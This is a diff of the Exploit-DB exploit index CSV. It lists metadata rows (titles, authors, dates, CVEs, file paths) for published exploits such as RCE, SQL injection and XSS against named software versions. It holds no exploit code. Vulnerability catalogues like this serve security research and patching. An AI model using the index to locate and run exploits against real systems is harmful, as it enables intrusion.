32798,exploits/multiple/remote/32798.pl,"ProFTPd 1.3 - 'mod_sql' 'Username' SQL Injection",2009-02-10,AlpHaNiX,remote,multiple,,2009-02-10,2014-04-11,1,CVE-2009-0542;OSVDB-51953,,,,,https://www.securityfocus.com/bid/33722/info
@ -11544,6 +11553,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48649,exploits/multiple/webapps/48649.txt,"BSA Radar 1.6.7234.24750 - Authenticated Privilege Escalation",2020-07-07,"William Summerhill",webapps,multiple,,2020-07-07,2020-07-07,0,CVE-2020-14945,,,,,
48666,exploits/multiple/webapps/48666.txt,"BSA Radar 1.6.7234.24750 - Local File Inclusion",2020-07-14,"William Summerhill",webapps,multiple,,2020-07-14,2020-07-14,0,CVE-2020-14946,,,,,
48619,exploits/multiple/webapps/48619.txt,"BSA Radar 1.6.7234.24750 - Persistent Cross-Site Scripting",2020-06-24,"William Summerhill",webapps,multiple,,2020-06-24,2020-06-24,0,CVE-2020-14943,,,,,
51254,exploits/multiple/webapps/51254.txt,"BTCPay Server v1.7.4 - HTML Injection.",2023-04-05,"Manojkumar J",webapps,multiple,,2023-04-05,2023-04-05,0,CVE-2023-0493,,,,,
31647,exploits/multiple/webapps/31647.txt,"CA 2E Web Option 8.1.2 - Authentication Bypass",2014-02-13,"Mike Emery",webapps,multiple,,2014-02-13,2014-02-13,0,CVE-2014-1219;OSVDB-103236,,,,,http://portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-1219/
48791,exploits/multiple/webapps/48791.txt,"Cabot 0.11.12 - Persistent Cross-Site Scripting",2020-09-07,"Abhiram V",webapps,multiple,,2020-09-07,2020-09-07,0,,,,,,
48144,exploits/multiple/webapps/48144.py,"Cacti 1.2.8 - Authenticated Remote Code Execution",2020-02-03,Askar,webapps,multiple,,2020-02-27,2020-02-27,0,CVE-2020-8813,,,,,https://github.com/mhaskar/CVE-2020-8813/blob/4877c2b2f378ce5937f56b259b69b02840514d4c/Cacti-postauth-rce.py
@ -11971,6 +11981,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50229,exploits/multiple/webapps/50229.txt,"ProcessMaker 3.5.4 - Local File inclusion",2021-08-26,"Ai Ho",webapps,multiple,,2021-08-26,2021-08-26,0,,,,,,
9728,exploits/multiple/webapps/9728.txt,"ProdLer 2.0 - Remote File Inclusion",2009-09-21,cr4wl3r,webapps,multiple,,2009-09-20,,1,OSVDB-58298;CVE-2009-3324,,,,,
35219,exploits/multiple/webapps/35219.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection (1)",2014-11-13,"Onur Alanbel (BGA)",webapps,multiple,,2014-11-17,2014-11-17,0,OSVDB-114840;CVE-2014-9237,,,,,
51264,exploits/multiple/webapps/51264.txt,"Provide Server v.14.4 XSS - CSRF & Remote Code Execution (RCE)",2023-04-05,"Andreas Finstad",webapps,multiple,,2023-04-05,2023-04-05,0,CVE-2023-23286,,,,,
12730,exploits/multiple/webapps/12730.txt,"ProWeb Design - SQL Injection",2010-05-24,cyberlog,webapps,multiple,,2010-05-23,,1,,,,,,
28340,exploits/multiple/webapps/28340.c,"PSWD.JS - Insecure Password Hash",2006-08-03,"Gianstefano Monni",webapps,multiple,,2006-08-03,2017-10-17,1,CVE-2006-4068;OSVDB-29777,,,,,https://www.securityfocus.com/bid/19333/info
47297,exploits/multiple/webapps/47297.rb,"Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure (Metasploit)",2019-08-21,"Alyssa Herrera",webapps,multiple,,2019-08-21,2019-08-21,0,CVE-2019-11510,,,,,
@ -12006,6 +12017,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49251,exploits/multiple/webapps/49251.txt,"Seacms 11.1 - 'checkuser' Stored XSS",2020-12-14,j5s,webapps,multiple,,2020-12-14,2020-12-14,0,,,,,,
49250,exploits/multiple/webapps/49250.txt,"Seacms 11.1 - 'file' Local File Inclusion",2020-12-14,j5s,webapps,multiple,,2020-12-14,2020-12-14,0,,,,,,
49249,exploits/multiple/webapps/49249.txt,"Seacms 11.1 - 'ip and weburl' Remote Command Execution",2020-12-14,j5s,webapps,multiple,,2020-12-14,2020-12-14,0,,,,,,
51237,exploits/multiple/webapps/51237.txt,"Secure Web Gateway 10.2.11 - Cross-Site Scripting (XSS)",2023-04-05,"RedTeam Pentesting GmbH",webapps,multiple,,2023-04-05,2023-04-05,0,CVE-2023-0214,,,,,
41877,exploits/multiple/webapps/41877.txt,"SedSystems D3 Decimator - Multiple Vulnerabilities",2016-01-11,prdelka,webapps,multiple,9784,2017-04-13,2017-04-13,0,,,,,,https://github.com/HackerFantastic/Public/blob/d1d3a421ba42ba476b0c23a3a09889a6cf1ee7a4/exploits/d3_decimator.txt
49452,exploits/multiple/webapps/49452.txt,"Selea CarPlateServer (CPS) 4.0.1.6 - Remote Program Execution",2021-01-22,LiquidWorm,webapps,multiple,,2021-01-22,2021-01-22,0,,,,,,
34000,exploits/multiple/webapps/34000.txt,"Serialsystem 1.0.4 Beta - 'list' Cross-Site Scripting",2010-01-18,indoushka,webapps,multiple,,2010-01-18,2014-07-08,1,,,,,,https://www.securityfocus.com/bid/40236/info
@ -12594,6 +12606,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
23311,exploits/php/dos/23311.txt,"E107 - 'Chatbox.php' Denial of Service",2003-10-29,Blademaster,dos,php,,2003-10-29,2012-12-11,1,CVE-2003-1191;OSVDB-2753,,,,,https://www.securityfocus.com/bid/8930/info
6481,exploits/php/dos/6481.c,"Femitter FTP Server 1.03 - 'RETR' Remote Denial of Service (PoC)",2008-09-17,LiquidWorm,dos,php,,2008-09-16,2017-04-20,1,CVE-2008-2032;OSVDB-44612,,,,http://www.exploit-db.comfem-dist.exe,
1573,exploits/php/dos/1573.php,"Guppy 4.5.11 - Delete Databases Remote Denial of Service",2006-03-10,trueend5,dos,php,,2006-03-09,,1,OSVDB-23846;CVE-2006-1224,,,,,
51256,exploits/php/dos/51256.txt,"ImageMagick 7.1.0-49 - DoS",2023-04-05,nu11secur1ty,dos,php,,2023-04-05,2023-04-05,0,CVE-2022-44267,,,,,
738,exploits/php/dos/738.c,"iWebNegar 1.1 - Configuration Nullification Denial of Service",2005-01-04,c0d3r,dos,php,,2005-01-03,,1,OSVDB-12800,,,,,
10820,exploits/php/dos/10820.sh,"Joomla! Component Core 1.5.x com_ - Denial of Service",2009-12-31,emgent,dos,php,80,2009-12-30,,1,,,,,http://www.exploit-db.comJoomla_1.5.15-Stable-Full_Package.zip,
21428,exploits/php/dos/21428.txt,"Messagerie 1.0 - Arbitrary User Removal Denial of Service",2002-04-27,frog,dos,php,,2002-04-27,2012-09-21,1,OSVDB-86916,,,,,https://www.securityfocus.com/bid/4635/info
@ -14555,6 +14568,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
35309,exploits/php/webapps/35309.txt,"Betsy 4.0 - 'page' Local File Inclusion",2011-02-02,MizoZ,webapps,php,,2011-02-02,2014-11-21,1,,,,,,https://www.securityfocus.com/bid/46124/info
10189,exploits/php/webapps/10189.txt,"Betsy CMS versions 3.5 - Local File Inclusion",2009-11-21,MizoZ,webapps,php,,2009-11-20,,1,CVE-2009-4056;OSVDB-60467,,,,,
23010,exploits/php/webapps/23010.txt,"Better Basket Pro 3.0 Store Builder - Full Path Disclosure",2003-08-11,G00db0y,webapps,php,,2003-08-11,2012-11-29,1,,,,,,https://www.securityfocus.com/bid/8386/info
51245,exploits/php/webapps/51245.txt,"bgERP v22.31 (Orlovets) - Cookie Session vulnerability & Cross-Site Scripting (XSS)",2023-04-05,nu11secur1ty,webapps,php,,2023-04-05,2023-04-05,0,,,,,,
37073,exploits/php/webapps/37073.html,"BGS CMS 2.2.1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-04-11,LiquidWorm,webapps,php,,2012-04-11,2015-05-21,1,,,,,,https://www.securityfocus.com/bid/52983/info
33649,exploits/php/webapps/33649.txt,"BGSvetionik BGS CMS - 'search' Cross-Site Scripting",2010-02-16,hacker@sr.gov.yu,webapps,php,,2010-02-16,2014-06-06,1,CVE-2010-0675;OSVDB-62363,,,,,https://www.securityfocus.com/bid/38264/info
21157,exploits/php/webapps/21157.txt,"bharat Mediratta Gallery 1.1/1.2 - Directory Traversal",2001-11-19,"Cabezon Aurelien",webapps,php,,2001-11-19,2012-09-08,1,CVE-2001-0900;OSVDB-677,,,,,https://www.securityfocus.com/bid/3554/info
@ -14985,6 +14999,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43825,exploits/php/webapps/43825.txt,"Burning Board < 2.3.1 - SQL Injection",2015-05-16,"GulfTech Security",webapps,php,,2018-01-19,2018-01-19,0,GTSA-00069;CVE-2005-1642,,,,,http://gulftech.org/advisories/Burning%20Board%20SQL%20Injection/69
12485,exploits/php/webapps/12485.txt,"Burning Board Lite 1.0.2 - Arbitrary File Upload",2010-05-02,indoushka,webapps,php,,2010-05-01,,0,,,,,,
43336,exploits/php/webapps/43336.html,"Bus Booking Script 1.0 - 'txtname' SQL Injection",2017-12-14,"Ihsan Sencan",webapps,php,,2017-12-14,2017-12-14,1,CVE-2017-17645,,,,,
51242,exploits/php/webapps/51242.txt,"Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS)",2023-04-05,"Matteo Conti",webapps,php,,2023-04-05,2023-04-05,0,,,,,,
50272,exploits/php/webapps/50272.txt,"Bus Pass Management System 1.0 - 'adminname' Stored Cross-Site Scripting (XSS)",2021-09-09,"Emre Aslan",webapps,php,,2021-09-09,2021-09-09,0,,,,,,
50543,exploits/php/webapps/50543.txt,"Bus Pass Management System 1.0 - 'Search' SQL injection",2021-11-23,"Abhijeet Singh",webapps,php,,2021-11-23,2021-11-23,0,,,,,,
50263,exploits/php/webapps/50263.txt,"Bus Pass Management System 1.0 - 'viewid' Insecure direct object references (IDOR)",2021-09-06,sudoninja,webapps,php,,2021-09-06,2021-09-06,0,,,,,,
@ -15077,6 +15092,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
31858,exploits/php/webapps/31858.txt,"Calcium 3.10/4.0.4 - 'Calcium40.pl' Cross-Site Scripting",2008-05-28,"Marvin Simkin",webapps,php,,2008-05-28,2014-02-24,1,CVE-2008-2507;OSVDB-45673,,,,,https://www.securityfocus.com/bid/29411/info
39173,exploits/php/webapps/39173.txt,"Caldera - '/costview2/jobs.php?tr' SQL Injection",2014-05-07,"Thomas Fischer",webapps,php,,2014-05-07,2016-01-05,1,CVE-2014-2934;OSVDB-106743,,,,,https://www.securityfocus.com/bid/67256/info
39174,exploits/php/webapps/39174.txt,"Caldera - '/costview2/printers.php?tr' SQL Injection",2014-05-07,"Thomas Fischer",webapps,php,,2014-05-07,2016-01-16,1,CVE-2014-2934;OSVDB-106741,,,,,https://www.securityfocus.com/bid/67256/info
51241,exploits/php/webapps/51241.txt,"Calendar Event Multi View 1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS)",2023-04-05,"Mostafa Farzaneh",webapps,php,,2023-04-05,2023-04-05,0,CVE-2022-2846,,,,,
29606,exploits/php/webapps/29606.txt,"Calendar Express - 'search.php' Cross-Site Scripting",2007-02-15,BL4CK,webapps,php,,2007-02-15,2013-11-15,1,,,,,,https://www.securityfocus.com/bid/22578/info
10758,exploits/php/webapps/10758.txt,"Calendar Express 2.0 - SQL Injection",2009-12-28,BAYBORA,webapps,php,,2009-12-27,,1,,,,,,
27990,exploits/php/webapps/27990.txt,"Calendar Express 2.2 - 'month.php' SQL Injection",2006-06-07,"CrAzY CrAcKeR",webapps,php,,2006-06-07,2013-09-01,1,CVE-2006-2973;OSVDB-26640,,,,,https://www.securityfocus.com/bid/18314/info
@ -15448,6 +15464,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
38322,exploits/php/webapps/38322.txt,"CKEditor - 'posteddata.php' Cross-Site Scripting",2013-02-19,AkaStep,webapps,php,,2013-02-19,2015-09-25,1,,,,,,https://www.securityfocus.com/bid/58045/info
50021,exploits/php/webapps/50021.txt,"CKEditor 3 - Server-Side Request Forgery (SSRF)",2021-06-16,ahmed,webapps,php,,2021-06-16,2021-06-16,0,,,,,,
24530,exploits/php/webapps/24530.txt,"CKEditor 4.0.1 - Multiple Vulnerabilities",2013-02-20,AkaStep,webapps,php,,2013-02-20,2013-02-20,0,OSVDB-90373;OSVDB-90372,,,,http://www.exploit-db.comckeditor_4.0.1_standard.zip,
51260,exploits/php/webapps/51260.txt,"CKEditor 5 35.4.0 - Cross-Site Scripting (XSS)",2023-04-05,"Manish Pathak",webapps,php,,2023-04-05,2023-04-05,0,CVE-2022-48110,,,,,
4349,exploits/php/webapps/4349.pl,"CKGold Shopping Cart 2.0 - 'category.php' Blind SQL Injection",2007-08-31,k1tk4t,webapps,php,,2007-08-30,2016-11-30,1,OSVDB-38422;CVE-2007-4736,,,,,
5678,exploits/php/webapps/5678.txt,"CKGold Shopping Cart 2.5 - 'category_id' SQL Injection",2008-05-27,Cr@zy_King,webapps,php,,2008-05-26,2016-11-30,1,OSVDB-45654;CVE-2008-2774,,,,,
11780,exploits/php/webapps/11780.html,"Clain_TIger_CMS - Cross-Site Request Forgery",2010-03-17,"pratul agrawal",webapps,php,,2010-03-16,,1,,,,,,
@ -16006,6 +16023,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
40366,exploits/php/webapps/40366.txt,"Contrexx CMS egov Module 1.0.0 - SQL Injection",2016-09-13,"hamidreza borghei",webapps,php,80,2016-09-13,2016-09-27,1,,,,,http://www.exploit-db.comcontrexx-opensource-1.0.zip,
17682,exploits/php/webapps/17682.php,"Contrexx ShopSystem 2.2 SP3 - 'catId' Blind SQL Injection",2011-08-17,Penguin,webapps,php,,2011-08-17,2016-12-05,0,,,,,,
17667,exploits/php/webapps/17667.php,"Contrexx ShopSystem 2.2 SP3 - Blind SQL Injection",2011-08-14,Penguin,webapps,php,,2011-08-14,2011-08-15,1,,,,,,
51250,exploits/php/webapps/51250.go,"Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE)",2023-04-05,"Mayank Deshmukh",webapps,php,,2023-04-05,2023-04-05,0,CVE-2022-44877,,,,,
27498,exploits/php/webapps/27498.txt,"CONTROLzx Hms 3.3.4 - 'dedicated_order.php?dedicatedPlanID' Cross-Site Scripting",2006-03-28,r0t,webapps,php,,2006-03-28,2013-08-11,1,CVE-2006-1430;OSVDB-24175,,,,,https://www.securityfocus.com/bid/17282/info
27499,exploits/php/webapps/27499.txt,"CONTROLzx Hms 3.3.4 - 'server_management.php?plan_id' Cross-Site Scripting",2006-03-28,r0t,webapps,php,,2006-03-28,2013-08-11,1,CVE-2006-1430;OSVDB-24176,,,,,https://www.securityfocus.com/bid/17282/info
27497,exploits/php/webapps/27497.txt,"CONTROLzx Hms 3.3.4 - 'shared_order.php?sharedPlanID' Cross-Site Scripting",2006-03-28,r0t,webapps,php,,2006-03-28,2013-08-11,1,CVE-2006-1430;OSVDB-24174,,,,,https://www.securityfocus.com/bid/17282/info
@ -18567,6 +18585,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
8900,exploits/php/webapps/8900.txt,"Frontis 3.9.01.24 - 'source_class' SQL Injection",2009-06-08,snakespc,webapps,php,,2009-06-07,,1,OSVDB-54927;CVE-2009-2013,,,,,
50502,exploits/php/webapps/50502.txt,"Froxlor 0.10.29.1 - SQL Injection (Authenticated)",2021-11-08,"Martin Cernac",webapps,php,,2021-11-08,2021-11-08,0,CVE-2021-42325,,,,http://www.exploit-db.comfroxlor-0.10.29.1.tar.gz,
16051,exploits/php/webapps/16051.txt,"Froxlor 0.9.15 - Remote File Inclusion",2011-01-26,DIES3L,webapps,php,,2011-01-26,2011-01-26,0,,,,,,
51263,exploits/php/webapps/51263.py,"Froxlor 2.0.3 Stable - Remote Code Execution (RCE)",2023-04-05,Askar,webapps,php,,2023-04-05,2023-04-05,0,CVE-2023-0315,,,,,
49063,exploits/php/webapps/49063.txt,"Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting",2020-11-17,Vulnerability-Lab,webapps,php,,2020-11-17,2020-11-17,0,,,,,,
37725,exploits/php/webapps/37725.txt,"Froxlor Server Management Panel 0.9.33.1 - MySQL Login Information Disclosure",2015-08-07,"Dustin Dörr",webapps,php,,2015-08-07,2015-08-07,0,OSVDB-125672,,,,http://www.exploit-db.comfroxlor-0.9.33.1.tar.gz,
39931,exploits/php/webapps/39931.txt,"FRticket Ticket System - Persistent Cross-Site Scripting",2016-06-13,"Hamit Abis",webapps,php,80,2016-06-13,2016-06-13,1,,,,,,
@ -19625,6 +19644,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
4895,exploits/php/webapps/4895.txt,"ImageAlbum 2.0.0b2 - 'id' SQL Injection",2008-01-11,"Raw Security",webapps,php,,2008-01-10,2016-11-08,1,OSVDB-40336;CVE-2008-0288;OSVDB-40335;OSVDB-40334,,,,http://www.exploit-db.comimagealbum-2.0.0b2.tar.gz,
42441,exploits/php/webapps/42441.txt,"ImageBay 1.0 - SQL Injection",2017-08-10,"Ihsan Sencan",webapps,php,,2017-08-10,2017-08-10,0,,,,,,
24365,exploits/php/webapps/24365.txt,"ImageCMS 4.0.0b - Multiple Vulnerabilities",2013-01-25,"High-Tech Bridge SA",webapps,php,,2013-01-25,2013-01-25,0,CVE-2012-6290;OSVDB-89513,,,,,https://www.htbridge.com/advisory/HTB23132
51261,exploits/php/webapps/51261.txt,"ImageMagick 7.1.0-49 - Arbitrary File Read",2023-04-05,"Cristian Giustini",webapps,php,,2023-04-05,2023-04-05,0,CVE-2022-44268,,,,,
41816,exploits/php/webapps/41816.txt,"ImagePro Lazygirls Clone Script - SQL Injection",2017-04-05,"Ihsan Sencan",webapps,php,,2017-04-05,2017-04-05,0,,,,,,
39058,exploits/php/webapps/39058.txt,"Imageview - 'upload.php' Arbitrary File Upload",2014-01-21,"TUNISIAN CYBER",webapps,php,,2014-01-21,2015-12-19,1,OSVDB-102426,,,,,https://www.securityfocus.com/bid/65059/info
2647,exploits/php/webapps/2647.php,"Imageview 5 - '/Cookie/index.php' Local/Remote File Inclusion",2006-10-25,Kacper,webapps,php,,2006-10-24,,1,OSVDB-30017;CVE-2006-5554,,,,,
@ -20041,6 +20061,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
41195,exploits/php/webapps/41195.txt,"Itech Real Estate Script 3.12 - SQL Injection",2017-01-30,"Kaan KAMIS",webapps,php,,2017-01-30,2017-01-30,0,,,,,,
42529,exploits/php/webapps/42529.txt,"iTech Social Networking Script 3.08 - SQL Injection",2017-08-21,"Ihsan Sencan",webapps,php,,2017-08-21,2017-08-21,0,,,,,,
42657,exploits/php/webapps/42657.txt,"iTech StockPhoto Script 2.02 - SQL Injection",2017-09-11,8bitsec,webapps,php,,2017-09-12,2017-09-12,0,,,,,,
51253,exploits/php/webapps/51253.txt,"itech TrainSmart r1044 - SQL injection",2023-04-05,"Adrian Bondocea",webapps,php,,2023-04-05,2023-04-05,0,CVE-2021-36520,,,,,
41023,exploits/php/webapps/41023.txt,"Itech Travel Portal Script 9.33 - SQL Injection",2017-01-11,"Ihsan Sencan",webapps,php,,2017-01-11,2017-02-02,0,,,,,,
41231,exploits/php/webapps/41231.txt,"Itech Travel Portal Script 9.35 - SQL Injection",2017-02-02,"Ihsan Sencan",webapps,php,,2017-02-02,2017-02-02,0,,,,,,
42511,exploits/php/webapps/42511.txt,"iTech Travel Script 9.49 - SQL Injection",2017-08-18,"Ihsan Sencan",webapps,php,,2017-08-18,2017-08-23,0,,,,,,
@ -24483,6 +24504,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43291,exploits/php/webapps/43291.txt,"Online Exam Test Application Script 1.6 - 'exams.php?sort' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,80,2017-12-11,2017-12-13,1,CVE-2017-17622,"SQL Injection (SQLi)",,,,
48476,exploits/php/webapps/48476.txt,"Online Examination System 1.0 - 'eid' SQL Injection",2020-05-18,BKpatron,webapps,php,,2020-05-18,2020-05-18,0,,,,,,
48969,exploits/php/webapps/48969.txt,"Online Examination System 1.0 - 'name' Stored Cross Site Scripting",2020-10-29,"Nikhil Kumar",webapps,php,,2020-10-29,2020-10-29,0,,,,,,
51246,exploits/php/webapps/51246.txt,"Online Eyewear Shop 1.0 - SQL Injection (Unauthenticated)",2023-04-05,"Muhammad Navaid Zafar Ansari",webapps,php,,2023-04-05,2023-04-05,0,,,,,,
5889,exploits/php/webapps/5889.txt,"Online Fantasy Football League (OFFL) 0.2.6 - 'teams.php' SQL Injection",2008-06-21,t0pP8uZz,webapps,php,,2008-06-20,2016-12-09,1,OSVDB-46485;CVE-2008-2890;OSVDB-46484;OSVDB-46483,,,,http://www.exploit-db.comoffl-0.2.6.zip,
4374,exploits/php/webapps/4374.txt,"Online Fantasy Football League (OFFL) 0.2.6 - Remote File Inclusion",2007-09-07,MhZ91,webapps,php,,2007-09-06,2016-10-12,1,OSVDB-36944;CVE-2007-4809;OSVDB-36943,,,,http://www.exploit-db.comoffl-0.2.6.zip,
48673,exploits/php/webapps/48673.txt,"Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting",2020-07-15,KeopssGroup0day_Inc,webapps,php,,2020-07-15,2020-07-15,0,,,,,,
@ -25563,6 +25585,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
25312,exploits/php/webapps/25312.txt,"PhotoPost Pro 5.1 - 'showphoto.php?photo' SQL Injection",2005-03-28,"Diabolic Crab",webapps,php,,2005-03-28,2013-05-08,1,CVE-2005-0929;OSVDB-15100,,,,,https://www.securityfocus.com/bid/12920/info
25310,exploits/php/webapps/25310.txt,"PhotoPost Pro 5.1 - 'Slideshow.php?photo' Cross-Site Scripting",2005-03-28,"Diabolic Crab",webapps,php,,2005-03-28,2013-05-08,1,CVE-2005-0928;OSVDB-15098,,,,,https://www.securityfocus.com/bid/12920/info
6082,exploits/php/webapps/6082.txt,"PhotoPost vBGallery 2.4.2 - Arbitrary File Upload",2008-07-15,"Cold Zero",webapps,php,,2008-07-14,,1,OSVDB-40193;CVE-2008-7088;CVE-2008-0251,,,,,
51236,exploits/php/webapps/51236.py,"PhotoShow 3.0 - Remote Code Execution",2023-04-05,"LSCP Responsible Disclosure Lab",webapps,php,,2023-04-05,2023-04-05,0,,,,,,
29658,exploits/php/webapps/29658.txt,"PhotoStand 1.2 - 'index.php' Cross-Site Scripting",2007-02-24,"Simon Bonnard",webapps,php,,2007-02-24,2013-11-18,1,CVE-2007-1101;OSVDB-33773,,,,,https://www.securityfocus.com/bid/22707/info
8289,exploits/php/webapps/8289.pl,"PhotoStand 1.2.0 - Remote Command Execution",2009-03-26,Osirys,webapps,php,,2009-03-25,,1,,,,,,
28662,exploits/php/webapps/28662.txt,"Photostore - 'details.php?gid' Cross-Site Scripting",2006-09-25,meto5757,webapps,php,,2006-09-25,2013-10-01,1,CVE-2006-5057;OSVDB-29161,,,,,https://www.securityfocus.com/bid/20172/info
@ -27912,6 +27935,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
31229,exploits/php/webapps/31229.txt,"ProjectPier 0.8 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2008-02-18,L4teral,webapps,php,,2008-02-18,2014-01-28,1,CVE-2008-5584;OSVDB-42376,,,,,https://www.securityfocus.com/bid/27857/info
35424,exploits/php/webapps/35424.py,"ProjectSend r-561 - Arbitrary File Upload",2014-12-02,"Fady Mohammed Osman",webapps,php,,2014-12-16,2014-12-16,0,OSVDB-116469;CVE-2014-9567,,,,http://www.exploit-db.comProjectSend-r561.zip,
50240,exploits/php/webapps/50240.txt,"Projectsend r1295 - 'name' Stored XSS",2021-08-30,"Abdullah Kala",webapps,php,,2021-08-30,2021-08-30,0,,,,,,
51238,exploits/php/webapps/51238.txt,"projectSend r1605 - Remote Code Exectution RCE",2023-04-05,"Mirabbas Ağalarov",webapps,php,,2023-04-05,2023-04-05,0,,,,,,
35582,exploits/php/webapps/35582.txt,"ProjectSend r561 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,webapps,php,80,2014-12-19,2014-12-27,0,CVE-2014-1155;CVE-2011-3713;CVE-2014-9580,,,,http://www.exploit-db.comProjectSend-r561.zip,
36303,exploits/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection",2015-03-06,"ITAS Team",webapps,php,80,2015-03-06,2015-03-06,0,OSVDB-119169;CVE-2015-2564,,,,http://www.exploit-db.comProjectSend-r561.zip,
39588,exploits/php/webapps/39588.txt,"ProjectSend r582 - Multiple Cross-Site Scripting Vulnerabilities",2016-03-21,"Michael Helwig",webapps,php,80,2016-03-21,2016-03-21,0,,,,,http://www.exploit-db.comProjectSend-r582.zip,
@ -28420,6 +28444,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43300,exploits/php/webapps/43300.txt,"Responsive Events & Movie Ticket Booking Script 3.2.1 - 'findcity.php?q' SQL Injection",2017-12-11,"Ihsan Sencan",webapps,php,,2017-12-11,2017-12-13,1,CVE-2017-17632,,,,,
49359,exploits/php/webapps/49359.py,"Responsive FileManager 9.13.4 - 'path' Path Traversal",2021-01-05,"Sun* Cyber Security Research Team",webapps,php,,2021-01-05,2021-04-08,0,,,,,,
45987,exploits/php/webapps/45987.txt,"Responsive FileManager 9.13.4 - Multiple Vulnerabilities",2018-12-14,"Fariskhi Vidyan",webapps,php,,2018-12-14,2018-12-14,0,,,,,http://www.exploit-db.comresponsive_filemanager.zip,
51251,exploits/php/webapps/51251.py,"Responsive FileManager 9.9.5 - Remote Code Execution (RCE)",2023-04-05,"Galoget Latorre",webapps,php,,2023-04-05,2023-04-05,0,CVE-2022-46604,,,,,
45271,exploits/php/webapps/45271.txt,"Responsive FileManager < 9.13.4 - Directory Traversal",2018-08-27,"Simon Uvarov",webapps,php,80,2018-08-27,2018-08-27,1,CVE-2018-15536;CVE-2018-15535,Traversal,,,http://www.exploit-db.comResponsiveFilemanager-9.13.3.tar.gz,
41272,exploits/php/webapps/41272.txt,"Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure",2017-02-07,"Wiswat Aswamenakul",webapps,php,,2017-02-07,2017-02-07,1,,,,,http://www.exploit-db.comResponsiveFilemanager-9.11.0.zip,
41533,exploits/php/webapps/41533.txt,"Responsive Matrimonial Script 4.0.1 - SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php,,2017-03-06,2017-03-06,0,,,,,,
@ -34219,6 +34244,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
881,exploits/php/webapps/881.txt,"ZPanel 2.5 - SQL Injection",2005-03-15,Mikhail,webapps,php,,2005-03-14,,1,OSVDB-14803;CVE-2005-0792,,,,,
996,exploits/php/webapps/996.pl,"ZPanel 2.5b10 - SQL Injection",2005-05-17,RusH,webapps,php,,2005-05-16,,1,,,,,,
51207,exploits/php/webapps/51207.txt,"Zstore 6.5.4 - Reflected Cross-Site Scripting (XSS)",2023-04-03,nu11secur1ty,webapps,php,,2023-04-03,2023-04-03,0,,,,,,
51240,exploits/php/webapps/51240.txt,"zstore 6.6.0 - Cross-Site Scripting (XSS)",2023-04-05,nu11secur1ty,webapps,php,,2023-04-05,2023-04-05,0,,,,,,
8567,exploits/php/webapps/8567.txt,"Zubrag Smart File Download 1.3 - Arbitrary File Download",2009-04-29,Aodrulez,webapps,php,,2009-04-28,,1,OSVDB-55259,,,,,
37010,exploits/php/webapps/37010.txt,"Zumset.com FbiLike 1.00 - 'id' Cross-Site Scripting",2012-03-25,Crim3R,webapps,php,,2012-03-25,2015-05-14,1,,,,,,https://www.securityfocus.com/bid/52720/info
33953,exploits/php/webapps/33953.txt,"Zurmo CRM - Persistent Cross-Site Scripting",2014-07-02,Provensec,webapps,php,80,2014-07-02,2014-07-09,0,OSVDB-108669,,,,http://www.exploit-db.comzurmo-stable-2.6.3.faaf3b4c8596.zip,
@ -34242,6 +34268,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49370,exploits/python/local/49370.txt,"dirsearch 0.4.1 - CSV Injection",2021-01-06,"Dolev Farhi",local,python,,2021-01-06,2021-01-06,0,,,,,,
50289,exploits/python/local/50289.py,"Facebook ParlAI 1.0.0 - Deserialization of Untrusted Data in parlai",2021-09-13,"Abhiram V",local,python,,2021-09-13,2021-09-13,0,CVE-2021-24040,,,,,
49342,exploits/python/local/49342.txt,"Knockpy 4.1.1 - CSV Injection",2021-01-04,"Dolev Farhi",local,python,,2021-01-04,2021-01-04,0,,,,,,
51249,exploits/python/remote/51249.py,"Binwalk v2.3.2 - Remote Command Execution (RCE)",2023-04-05,"Etienne Lacoche",remote,python,,2023-04-05,2023-04-05,0,CVE-2022-4510,,,,,
40170,exploits/python/remote/40170.rb,"Centreon 2.5.3 - Web Useralias Command Execution (Metasploit)",2016-07-27,Metasploit,remote,python,80,2016-07-27,2016-07-27,1,,"Metasploit Framework (MSF)",,,http://www.exploit-db.comcentreon-2.5.3.tar.gz,
41980,exploits/python/remote/41980.rb,"Crypttech CryptoLog - Remote Code Execution (Metasploit)",2017-05-09,"Mehmet Ince",remote,python,80,2017-05-09,2017-06-26,1,,"Metasploit Framework (MSF)",,,,https://github.com/rapid7/metasploit-framework/blob/05bf16e91ec22d94695da5ed643b5cd96f7f4924/modules/exploits/linux/http/crypttech_cryptolog_login_exec.rb
